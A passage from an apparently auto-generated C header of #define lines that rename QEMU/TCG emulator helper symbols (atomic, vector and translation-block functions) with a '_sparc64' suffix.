helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_sparc64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_sparc64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_sparc64 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_sparc64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_sparc64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_sparc64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_sparc64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_sparc64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_sparc64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_sparc64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_sparc64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_sparc64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_sparc64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_sparc64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_sparc64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_sparc64 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_sparc64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_sparc64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_sparc64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_sparc64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_sparc64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_sparc64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_sparc64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_sparc64 #define helper_atomic_fetch_andl_le_mmu 
helper_atomic_fetch_andl_le_mmu_sparc64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_sparc64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_sparc64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_sparc64 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_sparc64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_sparc64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_sparc64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_sparc64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_sparc64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_sparc64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_sparc64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_sparc64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_sparc64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_sparc64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_sparc64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_sparc64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_sparc64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_sparc64 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_sparc64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_sparc64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_sparc64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_sparc64 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_sparc64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_sparc64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_sparc64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_sparc64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_sparc64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_sparc64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_sparc64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_sparc64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_sparc64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_sparc64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_sparc64 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_sparc64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_sparc64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_sparc64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_sparc64 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_sparc64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_sparc64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_sparc64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_sparc64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_sparc64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_sparc64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_sparc64 #define helper_atomic_fetch_uminq_le_mmu 
helper_atomic_fetch_uminq_le_mmu_sparc64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_sparc64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_sparc64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_sparc64 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_sparc64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_sparc64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_sparc64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_sparc64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_sparc64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_sparc64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_sparc64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_sparc64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_sparc64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_sparc64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_sparc64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_sparc64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_sparc64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_sparc64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_sparc64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_sparc64 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_sparc64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_sparc64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_sparc64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_sparc64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_sparc64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_sparc64 #define helper_atomic_xchgb helper_atomic_xchgb_sparc64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_sparc64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_sparc64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_sparc64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_sparc64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_sparc64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_sparc64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_sparc64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_sparc64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_sparc64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_sparc64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_sparc64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_sparc64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_sparc64 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_sparc64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_sparc64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_sparc64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_sparc64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_sparc64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_sparc64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_sparc64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_sparc64 #define helper_atomic_fetch_xorw_le 
helper_atomic_fetch_xorw_le_sparc64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_sparc64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_sparc64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_sparc64 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_sparc64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_sparc64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_sparc64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_sparc64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_sparc64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_sparc64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_sparc64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_sparc64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_sparc64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_sparc64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_sparc64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_sparc64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_sparc64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_sparc64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_sparc64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_sparc64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_sparc64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_sparc64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_sparc64 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_sparc64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_sparc64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_sparc64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_sparc64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_sparc64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_sparc64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_sparc64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_sparc64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_sparc64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_sparc64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_sparc64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_sparc64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_sparc64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_sparc64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_sparc64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_sparc64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_sparc64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_sparc64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_sparc64 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_sparc64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_sparc64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_sparc64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_sparc64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_sparc64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_sparc64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_sparc64 #define helper_atomic_cmpxchgl_be 
helper_atomic_cmpxchgl_be_sparc64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_sparc64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_sparc64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_sparc64 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_sparc64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_sparc64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_sparc64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_sparc64 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_sparc64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_sparc64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_sparc64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_sparc64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_sparc64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_sparc64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_sparc64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_sparc64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_sparc64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_sparc64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_sparc64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_sparc64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_sparc64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_sparc64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_sparc64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_sparc64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_sparc64 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_sparc64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_sparc64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_sparc64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_sparc64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_sparc64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_sparc64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_sparc64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_sparc64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_sparc64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_sparc64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_sparc64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_sparc64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_sparc64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_sparc64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_sparc64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_sparc64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_sparc64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_sparc64 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_sparc64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_sparc64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_sparc64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_sparc64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_sparc64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_sparc64 #define helper_atomic_umin_fetchq_be 
helper_atomic_umin_fetchq_be_sparc64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_sparc64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_sparc64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_sparc64 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_sparc64 #define cpu_ldub_code cpu_ldub_code_sparc64 #define cpu_lduw_code cpu_lduw_code_sparc64 #define cpu_ldl_code cpu_ldl_code_sparc64 #define cpu_ldq_code cpu_ldq_code_sparc64 #define helper_div_i32 helper_div_i32_sparc64 #define helper_rem_i32 helper_rem_i32_sparc64 #define helper_divu_i32 helper_divu_i32_sparc64 #define helper_remu_i32 helper_remu_i32_sparc64 #define helper_shl_i64 helper_shl_i64_sparc64 #define helper_shr_i64 helper_shr_i64_sparc64 #define helper_sar_i64 helper_sar_i64_sparc64 #define helper_div_i64 helper_div_i64_sparc64 #define helper_rem_i64 helper_rem_i64_sparc64 #define helper_divu_i64 helper_divu_i64_sparc64 #define helper_remu_i64 helper_remu_i64_sparc64 #define helper_muluh_i64 helper_muluh_i64_sparc64 #define helper_mulsh_i64 helper_mulsh_i64_sparc64 #define helper_clz_i32 helper_clz_i32_sparc64 #define helper_ctz_i32 helper_ctz_i32_sparc64 #define helper_clz_i64 helper_clz_i64_sparc64 #define helper_ctz_i64 helper_ctz_i64_sparc64 #define helper_clrsb_i32 helper_clrsb_i32_sparc64 #define helper_clrsb_i64 helper_clrsb_i64_sparc64 #define helper_ctpop_i32 helper_ctpop_i32_sparc64 #define helper_ctpop_i64 helper_ctpop_i64_sparc64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_sparc64 #define helper_exit_atomic helper_exit_atomic_sparc64 #define helper_gvec_add8 helper_gvec_add8_sparc64 #define helper_gvec_add16 helper_gvec_add16_sparc64 #define helper_gvec_add32 helper_gvec_add32_sparc64 #define helper_gvec_add64 helper_gvec_add64_sparc64 #define helper_gvec_adds8 helper_gvec_adds8_sparc64 #define helper_gvec_adds16 helper_gvec_adds16_sparc64 #define helper_gvec_adds32 helper_gvec_adds32_sparc64 #define helper_gvec_adds64 helper_gvec_adds64_sparc64 #define helper_gvec_sub8 helper_gvec_sub8_sparc64 #define helper_gvec_sub16 helper_gvec_sub16_sparc64 #define helper_gvec_sub32 helper_gvec_sub32_sparc64 #define helper_gvec_sub64 helper_gvec_sub64_sparc64 #define helper_gvec_subs8 helper_gvec_subs8_sparc64 #define helper_gvec_subs16 helper_gvec_subs16_sparc64 #define helper_gvec_subs32 helper_gvec_subs32_sparc64 #define helper_gvec_subs64 helper_gvec_subs64_sparc64 #define helper_gvec_mul8 helper_gvec_mul8_sparc64 #define helper_gvec_mul16 helper_gvec_mul16_sparc64 #define helper_gvec_mul32 helper_gvec_mul32_sparc64 #define helper_gvec_mul64 helper_gvec_mul64_sparc64 #define helper_gvec_muls8 helper_gvec_muls8_sparc64 #define helper_gvec_muls16 helper_gvec_muls16_sparc64 #define helper_gvec_muls32 helper_gvec_muls32_sparc64 #define helper_gvec_muls64 helper_gvec_muls64_sparc64 #define helper_gvec_neg8 helper_gvec_neg8_sparc64 #define helper_gvec_neg16 helper_gvec_neg16_sparc64 #define helper_gvec_neg32 helper_gvec_neg32_sparc64 #define helper_gvec_neg64 helper_gvec_neg64_sparc64 #define helper_gvec_abs8 helper_gvec_abs8_sparc64 #define helper_gvec_abs16 helper_gvec_abs16_sparc64 #define helper_gvec_abs32 helper_gvec_abs32_sparc64 #define helper_gvec_abs64 helper_gvec_abs64_sparc64 #define helper_gvec_mov helper_gvec_mov_sparc64 #define helper_gvec_dup64 helper_gvec_dup64_sparc64 #define helper_gvec_dup32 helper_gvec_dup32_sparc64 #define helper_gvec_dup16 helper_gvec_dup16_sparc64 #define helper_gvec_dup8 helper_gvec_dup8_sparc64 #define 
helper_gvec_not helper_gvec_not_sparc64 #define helper_gvec_and helper_gvec_and_sparc64 #define helper_gvec_or helper_gvec_or_sparc64 #define helper_gvec_xor helper_gvec_xor_sparc64 #define helper_gvec_andc helper_gvec_andc_sparc64 #define helper_gvec_orc helper_gvec_orc_sparc64 #define helper_gvec_nand helper_gvec_nand_sparc64 #define helper_gvec_nor helper_gvec_nor_sparc64 #define helper_gvec_eqv helper_gvec_eqv_sparc64 #define helper_gvec_ands helper_gvec_ands_sparc64 #define helper_gvec_xors helper_gvec_xors_sparc64 #define helper_gvec_ors helper_gvec_ors_sparc64 #define helper_gvec_shl8i helper_gvec_shl8i_sparc64 #define helper_gvec_shl16i helper_gvec_shl16i_sparc64 #define helper_gvec_shl32i helper_gvec_shl32i_sparc64 #define helper_gvec_shl64i helper_gvec_shl64i_sparc64 #define helper_gvec_shr8i helper_gvec_shr8i_sparc64 #define helper_gvec_shr16i helper_gvec_shr16i_sparc64 #define helper_gvec_shr32i helper_gvec_shr32i_sparc64 #define helper_gvec_shr64i helper_gvec_shr64i_sparc64 #define helper_gvec_sar8i helper_gvec_sar8i_sparc64 #define helper_gvec_sar16i helper_gvec_sar16i_sparc64 #define helper_gvec_sar32i helper_gvec_sar32i_sparc64 #define helper_gvec_sar64i helper_gvec_sar64i_sparc64 #define helper_gvec_shl8v helper_gvec_shl8v_sparc64 #define helper_gvec_shl16v helper_gvec_shl16v_sparc64 #define helper_gvec_shl32v helper_gvec_shl32v_sparc64 #define helper_gvec_shl64v helper_gvec_shl64v_sparc64 #define helper_gvec_shr8v helper_gvec_shr8v_sparc64 #define helper_gvec_shr16v helper_gvec_shr16v_sparc64 #define helper_gvec_shr32v helper_gvec_shr32v_sparc64 #define helper_gvec_shr64v helper_gvec_shr64v_sparc64 #define helper_gvec_sar8v helper_gvec_sar8v_sparc64 #define helper_gvec_sar16v helper_gvec_sar16v_sparc64 #define helper_gvec_sar32v helper_gvec_sar32v_sparc64 #define helper_gvec_sar64v helper_gvec_sar64v_sparc64 #define helper_gvec_eq8 helper_gvec_eq8_sparc64 #define helper_gvec_ne8 helper_gvec_ne8_sparc64 #define helper_gvec_lt8 helper_gvec_lt8_sparc64 #define helper_gvec_le8 helper_gvec_le8_sparc64 #define helper_gvec_ltu8 helper_gvec_ltu8_sparc64 #define helper_gvec_leu8 helper_gvec_leu8_sparc64 #define helper_gvec_eq16 helper_gvec_eq16_sparc64 #define helper_gvec_ne16 helper_gvec_ne16_sparc64 #define helper_gvec_lt16 helper_gvec_lt16_sparc64 #define helper_gvec_le16 helper_gvec_le16_sparc64 #define helper_gvec_ltu16 helper_gvec_ltu16_sparc64 #define helper_gvec_leu16 helper_gvec_leu16_sparc64 #define helper_gvec_eq32 helper_gvec_eq32_sparc64 #define helper_gvec_ne32 helper_gvec_ne32_sparc64 #define helper_gvec_lt32 helper_gvec_lt32_sparc64 #define helper_gvec_le32 helper_gvec_le32_sparc64 #define helper_gvec_ltu32 helper_gvec_ltu32_sparc64 #define helper_gvec_leu32 helper_gvec_leu32_sparc64 #define helper_gvec_eq64 helper_gvec_eq64_sparc64 #define helper_gvec_ne64 helper_gvec_ne64_sparc64 #define helper_gvec_lt64 helper_gvec_lt64_sparc64 #define helper_gvec_le64 helper_gvec_le64_sparc64 #define helper_gvec_ltu64 helper_gvec_ltu64_sparc64 #define helper_gvec_leu64 helper_gvec_leu64_sparc64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_sparc64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_sparc64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_sparc64 #define helper_gvec_ssadd64 helper_gvec_ssadd64_sparc64 #define helper_gvec_sssub8 helper_gvec_sssub8_sparc64 #define helper_gvec_sssub16 helper_gvec_sssub16_sparc64 #define helper_gvec_sssub32 helper_gvec_sssub32_sparc64 #define helper_gvec_sssub64 helper_gvec_sssub64_sparc64 #define helper_gvec_usadd8 
helper_gvec_usadd8_sparc64 #define helper_gvec_usadd16 helper_gvec_usadd16_sparc64 #define helper_gvec_usadd32 helper_gvec_usadd32_sparc64 #define helper_gvec_usadd64 helper_gvec_usadd64_sparc64 #define helper_gvec_ussub8 helper_gvec_ussub8_sparc64 #define helper_gvec_ussub16 helper_gvec_ussub16_sparc64 #define helper_gvec_ussub32 helper_gvec_ussub32_sparc64 #define helper_gvec_ussub64 helper_gvec_ussub64_sparc64 #define helper_gvec_smin8 helper_gvec_smin8_sparc64 #define helper_gvec_smin16 helper_gvec_smin16_sparc64 #define helper_gvec_smin32 helper_gvec_smin32_sparc64 #define helper_gvec_smin64 helper_gvec_smin64_sparc64 #define helper_gvec_smax8 helper_gvec_smax8_sparc64 #define helper_gvec_smax16 helper_gvec_smax16_sparc64 #define helper_gvec_smax32 helper_gvec_smax32_sparc64 #define helper_gvec_smax64 helper_gvec_smax64_sparc64 #define helper_gvec_umin8 helper_gvec_umin8_sparc64 #define helper_gvec_umin16 helper_gvec_umin16_sparc64 #define helper_gvec_umin32 helper_gvec_umin32_sparc64 #define helper_gvec_umin64 helper_gvec_umin64_sparc64 #define helper_gvec_umax8 helper_gvec_umax8_sparc64 #define helper_gvec_umax16 helper_gvec_umax16_sparc64 #define helper_gvec_umax32 helper_gvec_umax32_sparc64 #define helper_gvec_umax64 helper_gvec_umax64_sparc64 #define helper_gvec_bitsel helper_gvec_bitsel_sparc64 #define cpu_restore_state cpu_restore_state_sparc64 #define page_collection_lock page_collection_lock_sparc64 #define page_collection_unlock page_collection_unlock_sparc64 #define free_code_gen_buffer free_code_gen_buffer_sparc64 #define tcg_exec_init tcg_exec_init_sparc64 #define tb_cleanup tb_cleanup_sparc64 #define tb_flush tb_flush_sparc64 #define tb_phys_invalidate tb_phys_invalidate_sparc64 #define tb_gen_code tb_gen_code_sparc64 #define tb_exec_lock tb_exec_lock_sparc64 #define tb_exec_unlock tb_exec_unlock_sparc64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_sparc64 #define tb_invalidate_phys_range tb_invalidate_phys_range_sparc64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_sparc64 #define tb_check_watchpoint tb_check_watchpoint_sparc64 #define cpu_io_recompile cpu_io_recompile_sparc64 #define tb_flush_jmp_cache tb_flush_jmp_cache_sparc64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_sparc64 #define translator_loop_temp_check translator_loop_temp_check_sparc64 #define translator_loop translator_loop_sparc64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_sparc64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_sparc64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_sparc64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_sparc64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_sparc64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_sparc64 #define unassigned_mem_ops unassigned_mem_ops_sparc64 #define floatx80_infinity floatx80_infinity_sparc64 #define dup_const_func dup_const_func_sparc64 #define gen_helper_raise_exception gen_helper_raise_exception_sparc64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_sparc64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_sparc64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_sparc64 #define gen_helper_cpsr_read gen_helper_cpsr_read_sparc64 #define gen_helper_cpsr_write gen_helper_cpsr_write_sparc64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_sparc64 #define helper_compute_psr helper_compute_psr_sparc64 #define helper_compute_C_icc helper_compute_C_icc_sparc64 #define 
